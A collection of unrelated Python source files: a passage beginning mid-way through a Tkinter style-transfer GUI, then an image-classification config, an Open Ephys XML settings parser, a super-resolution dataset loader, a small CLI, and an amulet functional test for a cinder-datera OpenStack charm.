               '--alpha ' + alpha + ' --style-path ' + s_path +
               ' --content-path ' + c_path + ' --out-path ' + output_path)
    print(command)
    os.system(command)
window = Tk()
# Window geometry: "width x height + left offset + top offset".
window.geometry("1000x800+50+50")
def import_style():
    """Ask the user for a style image and store its path in the global s_path."""
    global s_path
    window.filename = filedialog.askopenfilename(
        initialdir = "/", title = "Select file",
        filetypes = (("png files","*.png"),("all files","*.*")))
    # Normalise to Windows-style separators for the command line.
    s_path = window.filename.replace('/','\\')
def import_content():
    """Ask the user for a content image and store its path in the global c_path."""
    global c_path
    window.filename = filedialog.askopenfilename(
        initialdir = "/", title = "Select file",
        filetypes = (("png files","*.png"),("all files","*.*")))
    # Normalise to Windows-style separators for the command line.
    c_path = window.filename.replace('/','\\')
def save_output():
    """Ask the user for the output directory and store it in the global output_path."""
    global output_path
    window.filename = filedialog.askdirectory()
    # Normalise to Windows-style separators for the command line.
    output_path = window.filename.replace('/','\\')
def change_style():
    """Render the currently selected style image as a 200x200 preview label.

    Loads the image with PIL, resizes it, round-trips it through a .ppm
    file (plain Tk PhotoImage cannot read PNG on older Tk builds) and
    places it on the window.
    """
    #import image with PIL
    style_example = Image.open(s_path)
    #resize to new (width, height)
    style_example = style_example.resize((200,200), Image.ANTIALIAS)
    #convert to tkinter format
    style_example.save("pic1.ppm", "ppm")
    pic1 = PhotoImage(file='pic1.ppm')
    lb2 = Label(window, image = pic1)
    # BUGFIX: tkinter does not keep its own reference to the PhotoImage, so
    # 'pic1' was garbage-collected when this function returned and the label
    # rendered blank.  Attach it to the widget to keep it alive.
    lb2.image = pic1
    lb2.place(x=400, y=150)
# Alpha slider: style strength in percent (run() divides by 100).
alpha_scale = Scale(window, from_=0, to=100, length=500,tickinterval=10, orient=HORIZONTAL)
alpha_scale.set(60)
alpha_scale.place(x=100, y=500)
#change_style()
# Title banner.
lb1 = Label(window, text="Universal Style Transfer - Graphical User Interface", bd=16, relief="sunken", font = 'Times 28')
lb1.place(x=120, y=50)
# NOTE(review): the commented-out block below is the old static preview
# layout (style / content / output thumbnails); consider deleting it.
#import image with PIL
#style_example = Image.open(s_path)
#resize to new (width, height)
#style_example = style_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#style_example.save("pic1.ppm", "ppm")
#pic1 = PhotoImage(file='pic1.ppm')
#lb2 = Label(window, image = pic1, bd=16, relief="ridge")
#lb2.place(x=400, y=150)
#lb_plus = Label(window, text = '+', font = 'Times 40')
#lb_plus.place(x=350, y=240)
#import image with PIL
#content_example = Image.open(c_path)
#resize to new (width, height)
#content_example = content_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#content_example.save("pic2.ppm", "ppm")
#pic2 = PhotoImage(file='pic2.ppm')
#lb3 = Label(window, image = pic2, bd=16, relief="ridge")
#lb3.place(x=100, y=150)
#lb_equal = Label(window, text = '=', font = 'Times 40')
#lb_equal.place(x=650, y=240)
#lb_alpha = Label(window, text = 'Style Parameter', font = 'Times 20', bd=8, relief ='ridge')
#lb_alpha.place(x=650, y=500)
#import image with PIL
#output_example = Image.open(output_path + '\\tiger_van_gogh.png')
#resize to new (width, height)
#output_example = output_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#output_example.save("pic3.ppm", "ppm")
#pic3 = PhotoImage(file='pic3.ppm')
#lb4 = Label(window, image = pic3, bd=16, relief="ridge")
#lb4.place(x=700, y=150)
# Control buttons: choose inputs/output and start the transfer.
bt1 = Button(window, width=20, text="Style Image", command = import_style)
bt1.place(x=100, y=650)
bt2 = Button(window, width=20, text="Content Image", command = import_content)
bt2.place(x=100, y=700)
bt3 = Button(window, width=20, text="Output Folder", command = save_output)
bt3.place(x=500, y=680)
bt4 = Button(window, width=20, text="Run", command = run)
bt4.place(x=800, y=680)
# Enter the Tk event loop.
window.mainloop()
import os
from easydict import EasyDict as edict
# Experiment configuration tree (EasyDict) for CUB-200-2011 fine-grained
# classification.  Consumed via attribute access, e.g. cfg1.TRAIN.LR.
cfg1 = edict()
#-------- paths --------#
cfg1.PATH = edict()
# NOTE(review): machine-specific absolute dataset paths.
cfg1.PATH.DATA = ['/home/liuhaiyang/dataset/CUB_200_2011/images.txt',
                  '/home/liuhaiyang/dataset/CUB_200_2011/train_test_split.txt',
                  '/home/liuhaiyang/dataset/CUB_200_2011/images/']
cfg1.PATH.LABEL = '/home/liuhaiyang/dataset/CUB_200_2011/image_class_labels.txt'
cfg1.PATH.EVAL = ['/home/liuhaiyang/dataset/CUB_200_2011/images.txt',
                  '/home/liuhaiyang/dataset/CUB_200_2011/train_test_split.txt',
                  '/home/liuhaiyang/dataset/CUB_200_2011/images/']
cfg1.PATH.TEST = '/home/liuhaiyang/liu_kaggle/cifar/dataset/cifar-10-batches-py/data_batch_1'
cfg1.PATH.RES_TEST = './res_imgs/'
# Experiment output layout: EXPS/NAME/{MODEL,BESTMODEL,LOG,RESULTS}.
cfg1.PATH.EXPS = './exps/'
cfg1.PATH.NAME = 'eff_cub_v2_stone'
cfg1.PATH.MODEL = '/model.pth'
cfg1.PATH.BESTMODEL = '/bestmodel.pth'
cfg1.PATH.LOG = '/log.txt'
cfg1.PATH.RESULTS = '/results/'
#-------- reproducibility --------#
cfg1.DETERMINISTIC = edict()
cfg1.DETERMINISTIC.SEED = 60
cfg1.DETERMINISTIC.CUDNN = True
#-------- training --------#
cfg1.TRAIN = edict()
cfg1.TRAIN.EPOCHS = 60
cfg1.TRAIN.BATCHSIZE = 8
cfg1.TRAIN.L1SCALING = 100
cfg1.TRAIN.TYPE = 'sgd'
cfg1.TRAIN.LR = 1e-3
cfg1.TRAIN.BETA1 = 0.9
cfg1.TRAIN.BETA2 = 0.999
cfg1.TRAIN.LR_TYPE = 'cos'
cfg1.TRAIN.LR_REDUCE = [26,36]
cfg1.TRAIN.LR_FACTOR = 0.1
cfg1.TRAIN.WEIGHT_DECAY = 1e-4
cfg1.TRAIN.NUM_WORKERS = 16
cfg1.TRAIN.WARMUP = 0
cfg1.TRAIN.LR_WARM = 1e-7
#-------- data aug --------#
cfg1.TRAIN.USE_AUG = True
cfg1.TRAIN.CROP = 224
cfg1.TRAIN.PAD = 0
cfg1.TRAIN.RESIZE = 300
cfg1.TRAIN.ROATION = 30  # NOTE(review): likely a typo for ROTATION; renaming would break readers, kept as-is.
#-------- model --------#
cfg1.MODEL = edict()
cfg1.MODEL.NAME = 'regnet'
cfg1.MODEL.IN_DIM = 3
cfg1.MODEL.CLASS_NUM = 200
cfg1.MODEL.USE_FC = True
cfg1.MODEL.PRETRAIN = None
cfg1.MODEL.PRETRAIN_PATH = './exps/pretrain/'
cfg1.MODEL.DROPOUT = 0
cfg1.MODEL.LOSS = 'bce_only_g'
#-------- for resnet --------#
cfg1.MODEL.BLOCK = 'bottleneck'
cfg1.MODEL.BLOCK_LIST = [3,4,6,3]
cfg1.MODEL.CONV1 = (7,2,3)
cfg1.MODEL.OPERATION = 'B'
cfg1.MODEL.STRIDE1 = 1
cfg1.MODEL.MAX_POOL = True
cfg1.MODEL.BASE = 64
#-------- for regnet --------#
cfg1.MODEL.REGNET = edict()
cfg1.MODEL.REGNET.STEM_TYPE = "simple_stem_in"
cfg1.MODEL.REGNET.STEM_W = 32
cfg1.MODEL.REGNET.BLOCK_TYPE = "res_bottleneck_block"
cfg1.MODEL.REGNET.STRIDE = 2
cfg1.MODEL.REGNET.SE_ON = True
cfg1.MODEL.REGNET.SE_R = 0.25
cfg1.MODEL.REGNET.BOT_MUL = 1.0
cfg1.MODEL.REGNET.DEPTH = 20
cfg1.MODEL.REGNET.W0 = 232
cfg1.MODEL.REGNET.WA = 115.89
cfg1.MODEL.REGNET.WM = 2.53
cfg1.MODEL.REGNET.GROUP_W = 232
#-------- for anynet -------#
cfg1.MODEL.ANYNET = edict()
cfg1.MODEL.ANYNET.STEM_TYPE = "res_stem_in"
cfg1.MODEL.ANYNET.STEM_W = 64
cfg1.MODEL.ANYNET.BLOCK_TYPE = "res_bottleneck_block"
cfg1.MODEL.ANYNET.STRIDES = [1,2,2,2]
cfg1.MODEL.ANYNET.SE_ON = False
cfg1.MODEL.ANYNET.SE_R = 0.25
cfg1.MODEL.ANYNET.BOT_MULS = [0.5,0.5,0.5,0.5]
cfg1.MODEL.ANYNET.DEPTHS = [3,4,6,3]
cfg1.MODEL.ANYNET.GROUP_WS = [4,8,16,32]
cfg1.MODEL.ANYNET.WIDTHS = [256,512,1024,2048]
#-------- for effnet --------#
cfg1.MODEL.EFFNET = edict()
cfg1.MODEL.EFFNET.STEM_W = 32
cfg1.MODEL.EFFNET.EXP_RATIOS = [1,6,6,6,6,6,6]
cfg1.MODEL.EFFNET.KERNELS = [3,3,5,3,5,5,3]
cfg1.MODEL.EFFNET.HEAD_W = 1408
cfg1.MODEL.EFFNET.DC_RATIO = 0.0
cfg1.MODEL.EFFNET.STRIDES = [1,2,2,2,1,2,1]
cfg1.MODEL.EFFNET.SE_R = 0.25
cfg1.MODEL.EFFNET.DEPTHS = [2, 3, 3, 4, 4, 5, 2]
cfg1.MODEL.EFFNET.GROUP_WS = [4,8,16,32]
cfg1.MODEL.EFFNET.WIDTHS = [16,24,48,88,120,208,352]
#-------- misc --------#
cfg1.GPUS = [0]
cfg1.PRINT_FRE = 300
cfg1.DATASET_TRPE = 'cub200_2011'  # NOTE(review): likely a typo for DATASET_TYPE; renaming would break readers, kept as-is.
cfg1.SHORT_TEST = False
if __name__ == "__main__":
    # Smoke test: load and print the configuration.
    # NOTE(review): load_cfg1 appears to return a logger here -- confirm the utils API.
    from utils import load_cfg1
    logger = load_cfg1(cfg1)
    print(cfg1)
|
# -*- coding: utf-8 -*-
"""
Created on 20170704 21:15:19
@author: Thawann Malfatti
Loads info from the settings.xml file.
Examples:
File = '/Path/To/Experiment/settings.xml
# To get all info the xml file can provide:
AllInfo = SettingsXML.XML2Dict(File)
# AllInfo will be a dictionary following the same structure of the XML file.
# To get info only about channels recorded:
RecChs = SettingsXML.GetRecChs(File)[0]
# To get also the processor names:
RecChs, PluginNames = SettingsXML.GetRecChs(File)
# RecChs will be a dictionary:
#
# RecChs
# ProcessorNodeId
# ChIndex
# 'name'
# 'number'
# 'gain'
# 'PluginName'
"""
from xml.etree import ElementTree
def FindRecProcs(Ch, Proc, RecChs):
    """Register Ch in RecChs under its processor's NodeId when flagged for recording.

    Ch is a channel-info dict (keyed at least by 'number'); Proc is the
    processor dict holding the per-channel SELECTIONSTATE.  Returns the
    (mutated) RecChs accumulator.
    """
    ChNo = Ch['number']
    recording = Proc['CHANNEL'][ChNo]['SELECTIONSTATE']['record']
    if recording == '1':
        RecChs.setdefault(Proc['NodeId'], {})[ChNo] = Ch
    return(RecChs)
def Root2Dict(El):
    """Recursively convert an ElementTree element into nested dicts.

    Children carrying a 'name' attribute are grouped under their tag and
    keyed by that name; other children are keyed by tag directly.  The
    child's remaining attributes are merged into its dict.  A leaf element
    yields its attribute dict, or its text when it has no attributes.
    """
    Dict = {}
    # BUGFIX: Element.getchildren() was removed in Python 3.9; len(El)
    # counts direct children and is the supported spelling.
    if len(El):
        for SubEl in El:
            if SubEl.keys():
                if SubEl.get('name'):
                    if SubEl.tag not in Dict: Dict[SubEl.tag] = {}
                    Dict[SubEl.tag][SubEl.get('name')] = Root2Dict(SubEl)
                    # BUGFIX: "K is not 'name'" compared string identity and only
                    # worked by CPython interning accident; use != for values.
                    Dict[SubEl.tag][SubEl.get('name')].update(
                        {K: SubEl.get(K) for K in SubEl.keys() if K != 'name'}
                    )
                else:
                    Dict[SubEl.tag] = Root2Dict(SubEl)
                    Dict[SubEl.tag].update(
                        {K: SubEl.get(K) for K in SubEl.keys() if K != 'name'}
                    )
            else: Dict[SubEl.tag] = Root2Dict(SubEl)
        return(Dict)
    else:
        if El.items(): return(dict(El.items()))
        else: return(El.text)
def XML2Dict(File):
    """Parse a settings.xml file and return it as a nested dict (via Root2Dict)."""
    Root = ElementTree.parse(File).getroot()
    return(Root2Dict(Root))
def GetRecChs(File):
    """Return (RecChs, ProcNames) extracted from an Open Ephys settings.xml.

    RecChs maps processor NodeId -> {channel number -> channel-info dict};
    ProcNames maps NodeId -> plugin name (or processor name as fallback).
    """
    Info = XML2Dict(File)
    RecChs = {}; ProcNames = {}
    for P, Proc in Info['SIGNALCHAIN']['PROCESSOR'].items():
        # Remember the source processor's key (P[:] copies the string).
        # Older files flag it with isSource; newer ones use a 'Sources/...' name.
        if 'isSource' in Proc:
            if Proc['isSource'] == '1': SourceProc = P[:]
        else:
            if Proc['name'].split('/')[0] == 'Sources': SourceProc = P[:]
        # Collect channels flagged for recording, from whichever layout
        # this processor uses (CHANNEL_INFO or plain CHANNEL).
        if 'CHANNEL_INFO' in Proc and Proc['CHANNEL_INFO']:
            for Ch in Proc['CHANNEL_INFO']['CHANNEL'].values():
                RecChs = FindRecProcs(Ch, Proc, RecChs)
        elif 'CHANNEL' in Proc:
            for Ch in Proc['CHANNEL'].values():
                RecChs = FindRecProcs(Ch, Proc, RecChs)
        else: continue
        # Prefer the plugin name when the processor exposes one.
        if 'pluginName' in Proc:
            ProcNames[Proc['NodeId']] = Proc['pluginName']
        else:
            ProcNames[Proc['NodeId']] = Proc['name']
    # Rebind SourceProc to the source processor's channel-description dict,
    # used below to fill in fields missing from recorded channels.
    # NOTE(review): raises NameError if the file defines no source processor.
    if Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL_INFO']:
        SourceProc = Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL_INFO']['CHANNEL']
    else:
        SourceProc = Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL']
    for P, Proc in RecChs.items():
        for C, Ch in Proc.items():
            # Channels lacking 'gain' inherit it (and any other fields)
            # from the matching source channel with the same number.
            if 'gain' not in Ch:
                RecChs[P][C].update([c for c in SourceProc.values() if c['number'] == C][0])
    return(RecChs, ProcNames)
|
from .src.models import * |
import random
import numpy as np
import cv2
import lmdb
import torch
import torch.utils.data as data
import data.util as util
class CrossnetDataset(data.Dataset):
    """
    Dataset of aligned LQ_UX4 (bicubic-upsampled low quality), Ref (reference),
    SR (super-resolved) and GT (ground truth) image quadruplets for CrossNet
    training.  Images are read from image folders or lmdb, randomly cropped
    (training only), augmented, and returned as CHW RGB float tensors.
    """
    def __init__(self, opt):
        super(CrossnetDataset, self).__init__()
        # opt: options dict with dataroot_* paths, data_type, phase, sizes, etc.
        self.opt = opt
        self.data_type = self.opt['data_type']
        self.paths_LQ_UX4, self.paths_Ref, self.paths_SR, self.paths_GT = None, None, None, None
        self.sizes_LQ_UX4, self.sizes_Ref, self.sizes_SR, self.sizes_GT = None, None, None, None
        self.LQ_UX4_env, self.Ref_env, self.SR_env, self.GT_env = None, None, None, None  # environments for lmdb
        # Resolve image path lists (and, for lmdb, per-image size strings).
        self.paths_GT, self.sizes_GT = util.get_image_paths(self.data_type, opt['dataroot_GT'])
        self.paths_Ref, self.sizes_Ref = util.get_image_paths(self.data_type, opt['dataroot_Ref'])
        self.paths_SR, self.sizes_SR = util.get_image_paths(self.data_type, opt['dataroot_SR'])
        self.paths_LQ_UX4, self.sizes_LQ_UX4 = util.get_image_paths(self.data_type, opt['dataroot_LQ_UX4'])
        assert self.paths_GT, 'Error: GT path is empty.'
        if self.paths_Ref and self.paths_GT:
            assert len(self.paths_Ref) == len(
                self.paths_GT
            ), 'GT and Ref datasets have different number of images - {}, {}.'.format(
                len(self.paths_Ref), len(self.paths_GT))
        self.random_scale_list = [1]
    def _init_lmdb(self):
        # Open lmdb environments lazily per worker process; see
        # https://github.com/chainer/chainermn/issues/129
        self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False,
                                meminit=False)
        self.LQ_UX4_env = lmdb.open(self.opt['dataroot_LQ_UX4'], readonly=True, lock=False, readahead=False,
                                    meminit=False)
        self.Ref_env = lmdb.open(self.opt['dataroot_Ref'], readonly=True, lock=False, readahead=False,
                                 meminit=False)
        self.SR_env = lmdb.open(self.opt['dataroot_SR'], readonly=True, lock=False, readahead=False,
                                meminit=False)
    def __getitem__(self, index):
        """Return one aligned sample dict: LQ_UX4 / Ref / SR / GT tensors plus their paths."""
        if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_UX4_env is None):
            self._init_lmdb()
        GT_path, LQ_UX4_path, Ref_path, SR_path = None, None, None, None
        scale = self.opt['scale']
        GT_size = self.opt['GT_size']
        # get GT image (lmdb entries carry their resolution as 'C_H_W').
        GT_path = self.paths_GT[index]
        resolution = [int(s) for s in self.sizes_GT[index].split('_')
                      ] if self.data_type == 'lmdb' else None
        img_GT = util.read_img(self.GT_env, GT_path, resolution)
        if self.opt['phase'] != 'train':  # modcrop in the validation / test phase
            img_GT = util.modcrop(img_GT, scale)
        #if self.opt['color']:  # change color space if necessary
        #    img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
        # get Ref image
        Ref_path = self.paths_Ref[index]
        resolution = [int(s) for s in self.sizes_Ref[index].split('_')
                      ] if self.data_type == 'lmdb' else None
        img_Ref = util.read_img(self.Ref_env, Ref_path, resolution)
        if self.opt['Ref_color']:  # change color space if necessary
            img_Ref = util.channel_convert(img_Ref.shape[2], self.opt['Ref_color'], [img_Ref])[0]
        # get SR image
        SR_path = self.paths_SR[index]
        resolution = [int(s) for s in self.sizes_SR[index].split('_')
                      ] if self.data_type == 'lmdb' else None
        img_SR = util.read_img(self.SR_env, SR_path, resolution)
        # get LQ_UX4 image
        if self.paths_LQ_UX4:
            LQ_UX4_path = self.paths_LQ_UX4[index]
            resolution = [int(s) for s in self.sizes_LQ_UX4[index].split('_')
                          ] if self.data_type == 'lmdb' else None
            img_LQ_UX4 = util.read_img(self.LQ_UX4_env, LQ_UX4_path, resolution)
        if self.opt['phase'] == 'train':
            H, W, C = img_LQ_UX4.shape
            LQ_size = GT_size
            # randomly crop the same window from all four images
            # (assumes the four inputs share one resolution -- TODO confirm).
            rnd_h = random.randint(0, max(0, H - LQ_size))
            rnd_w = random.randint(0, max(0, W - LQ_size))
            img_LQ_UX4 = img_LQ_UX4[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
            img_Ref = img_Ref[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
            img_SR = img_SR[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
            img_GT = img_GT[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :]
            # augmentation - flip, rotate (applied identically to all four)
            img_LQ_UX4, img_Ref, img_SR, img_GT = util.augment([img_LQ_UX4, img_Ref, img_SR, img_GT], self.opt['use_flip'],
                                                               self.opt['use_rot'])
        # BGR to RGB, HWC to CHW, numpy to tensor
        if img_GT.shape[2] == 3:
            img_GT = img_GT[:, :, [2, 1, 0]]
            img_LQ_UX4 = img_LQ_UX4[:, :, [2, 1, 0]]
            img_SR = img_SR[:, :, [2, 1, 0]]
        if img_Ref.shape[2] == 3:
            img_Ref = img_Ref[:, :, [2, 1, 0]]
        img_GT = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GT, (2, 0, 1)))).float()
        img_LQ_UX4 = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQ_UX4, (2, 0, 1)))).float()
        img_SR = torch.from_numpy(np.ascontiguousarray(np.transpose(img_SR, (2, 0, 1)))).float()
        img_Ref = torch.from_numpy(np.ascontiguousarray(np.transpose(img_Ref, (2, 0, 1)))).float()
        return {'LQ_UX4': img_LQ_UX4,'Ref': img_Ref, 'SR': img_SR, 'GT': img_GT, 'LQ_UX4_path': LQ_UX4_path, 'Ref_path': Ref_path, 'SR_path': SR_path, 'GT_path': GT_path}
    def __len__(self):
        # Dataset length is defined by the GT image list.
        return len(self.paths_GT)
|
#!/usr/bin/env python3
'''
# ppe-cli.py
# interactive search of playerprofiler
'''
import logging
import click
from nfl.ppe import PlayerProfilerExplorer
# CLI entry point: configure file logging, then start the interactive
# PlayerProfiler explorer loop.  Comments only (no docstring) so click's
# generated --help text is unchanged.
@click.command()
@click.option('-h', '--path', type=str, default='/tmp',
              help='Save path')
@click.option('-f', '--file_name', type=str,
              help='Path for pp lookup json file')
@click.option('-c', '--cache_name', type=str, default='pgf-cli',
              help='Name for cache')
def run(path, file_name, cache_name):
    logger = logging.getLogger(__name__)
    # NOTE(review): the log file is "tgf.log" while the default cache is
    # "pgf-cli" and the script is ppe-cli -- presumably copied from a sibling
    # tool; confirm the intended names.
    hdlr = logging.FileHandler(f"{path}/tgf.log")
    formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
    hdlr.setFormatter(formatter)
    logger.addHandler(hdlr)
    # Only errors are written to the log file.
    logger.setLevel(logging.ERROR)
    ppe = PlayerProfilerExplorer(file_name, cache_name=cache_name)
    # Blocks until the user exits the interactive shell.
    ppe.cmdloop()


if __name__ == '__main__':
    run()
|
# Copyright 2014-2015 Canonical Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Basic cinder-datera functional test.
"""
import json
import amulet
from charmhelpers.contrib.openstack.amulet.deployment import (
OpenStackAmuletDeployment
)
from charmhelpers.contrib.openstack.amulet.utils import (
OpenStackAmuletUtils,
DEBUG,
)
ARCHIVE_URL = ('https://github.com/Datera/cinder-driver/archive/'
'v2018.11.14.0.tar.gz')
# Use DEBUG to turn on debug logging
u = OpenStackAmuletUtils(DEBUG)
class CinderDateraBasicDeployment(OpenStackAmuletDeployment):
    """Amulet tests on a basic cinder-datera deployment.

    Deploys cinder with the cinder-datera subordinate plus its supporting
    services (keystone, percona-cluster, rabbitmq-server), then verifies
    services, users, endpoints, relations and rendered configuration.
    """

    def __init__(self, series=None, openstack=None, source=None, stable=False,
                 install_type="github"):
        """Deploy the entire test environment."""
        super(CinderDateraBasicDeployment, self).__init__(series, openstack,
                                                          source, stable)
        self._add_services()
        self._add_relations()
        self._configure_services(install_type)
        self._deploy()

        u.log.info('Waiting on extended status checks...')
        exclude_services = ['nrpe']

        # Wait for deployment ready msgs, except exclusions
        self._auto_wait_for_status(exclude_services=exclude_services)

        self.d.sentry.wait()
        self._initialize_tests()

    def _add_services(self):
        """Add the services that we're testing, where cinder-datera is
        local, and the rest of the services are from lp branches that
        are compatible with the local charm (e.g. stable or next).
        """
        # Note: cinder-datera becomes a cinder subordinate unit.
        this_service = {'name': 'cinder-datera'}
        other_services = [
            {'name': 'percona-cluster'},
            {'name': 'keystone'},
            {'name': 'rabbitmq-server'},
            {'name': 'cinder'}
        ]
        super(CinderDateraBasicDeployment, self)._add_services(
            this_service, other_services, no_origin=['cinder-datera'])

    def _add_relations(self):
        """Add all of the relations for the services."""
        relations = {
            'cinder:storage-backend': 'cinder-datera:storage-backend',
            'keystone:shared-db': 'percona-cluster:shared-db',
            'cinder:shared-db': 'percona-cluster:shared-db',
            'cinder:identity-service': 'keystone:identity-service',
            'cinder:amqp': 'rabbitmq-server:amqp',
        }
        super(CinderDateraBasicDeployment, self)._add_relations(relations)

    def _configure_services(self, install_type):
        """Configure all of the services."""
        keystone_config = {
            'admin-password': 'openstack',
            'admin-token': 'ubuntutesting'
        }
        pxc_config = {
            'innodb-buffer-pool-size': '256M',
            'max-connections': 1000,
        }
        cinder_config = {
            'block-device': 'None',
            'glance-api-version': '2'
        }
        cinder_datera_config = {
            'san_ip': '172.19.1.222',
            'san_login': 'admin',
            'san_password': 'password',
            'install_type': install_type
        }
        # The archive-url install type additionally needs the driver tarball.
        if install_type == 'archive-url':
            cinder_datera_config['install_url'] = ARCHIVE_URL

        configs = {
            'keystone': keystone_config,
            'percona-cluster': pxc_config,
            'cinder': cinder_config,
            'cinder-datera': cinder_datera_config
        }
        super(CinderDateraBasicDeployment,
              self)._configure_services(configs)

    def _initialize_tests(self):
        """Perform final initialization before tests get run."""
        # Access the sentries for inspecting service units
        self.pxc_sentry = self.d.sentry['percona-cluster'][0]
        self.keystone_sentry = self.d.sentry['keystone'][0]
        self.rabbitmq_sentry = self.d.sentry['rabbitmq-server'][0]
        self.cinder_sentry = self.d.sentry['cinder'][0]
        self.cinder_datera_sentry = self.d.sentry['cinder-datera'][0]
        u.log.debug('openstack release val: {}'.format(
            self._get_openstack_release()))
        u.log.debug('openstack release str: {}'.format(
            self._get_openstack_release_string()))

        # Authenticate admin with keystone (session-based)
        self.keystone_session, self.keystone = u.get_default_keystone_session(
            self.keystone_sentry,
            openstack_release=self._get_openstack_release())

        # Cinder API v2 from Pike onwards, v1 before
        if self._get_openstack_release() >= self.xenial_pike:
            api_version = 2
        else:
            api_version = 1

        # Authenticate admin with keystone (legacy helper; overwrites the
        # session-based client above, kept for the cinder helper below)
        self.keystone = u.authenticate_keystone_admin(self.keystone_sentry,
                                                      user='admin',
                                                      password='openstack',
                                                      tenant='admin')
        # Authenticate admin with cinder endpoint
        self.cinder = u.authenticate_cinder_admin(self.keystone, api_version)

    def test_102_services(self):
        """Verify the expected services are running on the service units."""
        if self._get_openstack_release() >= self.xenial_ocata:
            # cinder-api moved behind apache2 in Ocata
            cinder_services = ['apache2',
                               'cinder-scheduler',
                               'cinder-volume']
        else:
            cinder_services = ['cinder-api',
                               'cinder-scheduler',
                               'cinder-volume']
        services = {
            self.cinder_sentry: cinder_services,
        }
        ret = u.validate_services_by_name(services)
        if ret:
            amulet.raise_status(amulet.FAIL, msg=ret)

    def test_110_users(self):
        """Verify expected users."""
        u.log.debug('Checking keystone users...')
        expected = [
            {'name': 'cinder_cinderv2',
             'enabled': True,
             'tenantId': u.not_null,
             'id': u.not_null,
             'email': 'juju@localhost'},
            {'name': 'admin',
             'enabled': True,
             'tenantId': u.not_null,
             'id': u.not_null,
             'email': 'juju@localhost'}
        ]
        # Service username changed from Pike onwards
        if self._get_openstack_release() > self.xenial_ocata:
            expected[0]['name'] = 'cinderv2_cinderv3'
        actual = self.keystone.users.list()
        ret = u.validate_user_data(expected, actual)
        if ret:
            amulet.raise_status(amulet.FAIL, msg=ret)

    def test_112_service_catalog(self):
        """Verify that the service catalog endpoint data"""
        u.log.debug('Checking keystone service catalog...')
        endpoint_vol = {'adminURL': u.valid_url,
                        'region': 'RegionOne',
                        'publicURL': u.valid_url,
                        'internalURL': u.valid_url}
        endpoint_id = {'adminURL': u.valid_url,
                       'region': 'RegionOne',
                       'publicURL': u.valid_url,
                       'internalURL': u.valid_url}
        if self._get_openstack_release() >= self.trusty_icehouse:
            endpoint_vol['id'] = u.not_null
            endpoint_id['id'] = u.not_null

        # Use the volume template for the volume service entries (it was
        # previously built but unused; the two templates are identical).
        if self._get_openstack_release() >= self.xenial_pike:
            # Pike and later
            expected = {'identity': [endpoint_id],
                        'volumev2': [endpoint_vol]}
        else:
            # Ocata and prior
            expected = {'identity': [endpoint_id],
                        'volume': [endpoint_vol]}
        actual = self.keystone.service_catalog.get_endpoints()

        ret = u.validate_svc_catalog_endpoint_data(
            expected,
            actual,
            openstack_release=self._get_openstack_release())
        if ret:
            amulet.raise_status(amulet.FAIL, msg=ret)

    def test_114_cinder_endpoint(self):
        """Verify the cinder endpoint data."""
        u.log.debug('Checking cinder endpoint...')
        endpoints = self.keystone.endpoints.list()
        admin_port = internal_port = public_port = '8776'

        if self._get_openstack_release() >= self.xenial_queens:
            # Queens+: keystone v3 endpoint records
            expected = {
                'id': u.not_null,
                'region': 'RegionOne',
                'region_id': 'RegionOne',
                'url': u.valid_url,
                'interface': u.not_null,
                'service_id': u.not_null}
            ret = u.validate_v3_endpoint_data(
                endpoints,
                admin_port,
                internal_port,
                public_port,
                expected,
                6)
        else:
            expected = {
                'id': u.not_null,
                'region': 'RegionOne',
                'adminurl': u.valid_url,
                'internalurl': u.valid_url,
                'publicurl': u.valid_url,
                'service_id': u.not_null}
            ret = u.validate_v2_endpoint_data(
                endpoints,
                admin_port,
                internal_port,
                public_port,
                expected)
        if ret:
            amulet.raise_status(amulet.FAIL,
                                msg='cinder endpoint: {}'.format(ret))

    def test_202_cinderdatera_cinder_backend_relation(self):
        """Verify the cinder-datera:storage-backend relation data."""
        u.log.debug('Checking cinder-datera:storage-backend to '
                    'cinder:storage-backend relation data...')
        unit = self.cinder_datera_sentry
        relation = ['storage-backend', 'cinder:storage-backend']

        # Subordinate config injected into cinder.conf by the subordinate.
        sub = {"cinder":
               {"/etc/cinder/cinder.conf":
                {"sections":
                 {"cinder-datera": [
                     ["san_ip", "172.19.1.222"],
                     ["san_login", "admin"],
                     ["san_password", "password"],
                     ["volume_backend_name", "cinder-datera"],
                     ["volume_driver",
                      "cinder.volume.drivers.datera."
                      "datera_iscsi.DateraDriver"],
                     ["use_multipath_for_image_xfer", "true"],
                 ]}}}}

        expected = {
            'subordinate_configuration': json.dumps(sub),
            'private-address': u.valid_ip,
            'backend_name': 'cinder-datera',
            'egress-subnets': u.not_null,
            'ingress-address': u.valid_ip,
        }

        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
            msg = u.relation_error(
                'cinder cinder-datera storage-backend', ret)
            amulet.raise_status(amulet.FAIL, msg=msg)

    def test_203_cinder_cinderdatera_backend_relation(self):
        """Verify the cinder:storage-backend relation data."""
        u.log.debug('Checking cinder:storage-backend to '
                    'cinder-datera:storage-backend relation data...')
        unit = self.cinder_sentry
        relation = ['storage-backend', 'cinder-datera:storage-backend']

        expected = {
            'private-address': u.valid_ip,
        }

        ret = u.validate_relation_data(unit, relation, expected)
        if ret:
